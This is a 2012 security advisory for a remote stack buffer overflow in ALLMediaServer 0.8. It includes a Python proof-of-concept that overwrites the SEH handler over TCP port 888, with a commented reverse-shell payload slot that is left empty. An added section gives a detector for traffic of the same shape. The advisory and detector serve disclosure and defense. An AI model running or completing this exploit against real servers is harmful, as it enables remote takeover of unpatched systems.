Release date: 2012-07-16
Update date: 2012-07-17

Affected systems:
allmediaserver allmediaserver 0.x
Description:
--------------------------------------------------------------------------------
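BUGTRAQ ID: 54475

ALLMediaServer is a free, general-purpose DLNA server. ALLMediaServer 0.8 has a boundary error when handling certain network requests; by sending a specially crafted packet to TCP port 888, a remote attacker can exploit this vulnerability to cause a stack buffer overflow.

<*Source: motaz reda
Links: http://secunia.com/advisories/49931/
http://www.exploit-db.com/exploits/19625/
*>

Test method:
--------------------------------------------------------------------------------
Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use it at your own risk!

motaz reda provided the following test method: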
#!/usr/bin/python
import sys, socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 888))

buffer = "A" * 1072
buffer += "\xeb\x06\x90\x90"  # NSEH jmp short 6
buffer += "\xca\x24\xec\x65"  # SEH POP POP RETN

# msfpayload windows/shell_reverse_tcp
# you can replace the shellcode with any shellcode you want
shellcode = ""  # placeholder: encoded payload bytes not reproduced
buffer += shellcode

s.send(buffer)
s.close()

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

allmediaserver
--------------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://allmediaserver.org/en/
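
With no vendor patch available, one network-side check is to inspect payloads bound for TCP port 888 for the shape of the test script above. The following is an added example, not part of the original advisory or the vendor's code; the function names, the 256-byte run threshold, the assumption that legitimate requests are shorter than the 1072-byte filler, and the sample payloads are all constructed for illustration.

```python
import re

PORT = 888          # service port named in the advisory
FILLER_LEN = 1072   # filler length used by the test script
MIN_RUN = 256       # assumption: shortest repeated-byte run worth flagging
# Short jump followed by two NOPs (EB xx 90 90), as in the script's NSEH value.
SHORT_JMP = re.compile(rb"\xeb[\x00-\x7f]\x90\x90")


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte value."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def inspect(dst_port: int, payload: bytes) -> list:
    """Return the reasons a payload sent to the server resembles the overflow."""
    if dst_port != PORT:
        return []
    reasons = []
    # Assumption: legitimate requests are shorter than the filler; tune on real traffic.
    if len(payload) > FILLER_LEN:
        reasons.append("oversized")
    if longest_run(payload) >= MIN_RUN:
        reasons.append("filler-run")
    # A short-jump record only counts when it sits behind a long lead-in.
    if any(m.start() >= MIN_RUN for m in SHORT_JMP.finditer(payload)):
        reasons.append("seh-record")
    return reasons


# Constructed samples: a short benign message and an inert payload with the
# same layout as the test script (filler, short jump, zero bytes, no shellcode).
SAMPLE_BENIGN = b"hello" * 10
SAMPLE_POC_SHAPED = b"A" * FILLER_LEN + b"\xeb\x06\x90\x90" + b"\x00" * 36

if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("poc-shaped", SAMPLE_POC_SHAPED)):
        print(name, inspect(PORT, sample))
```

Any one reason is a weak signal on its own; alerting when two or more fire keeps false positives down.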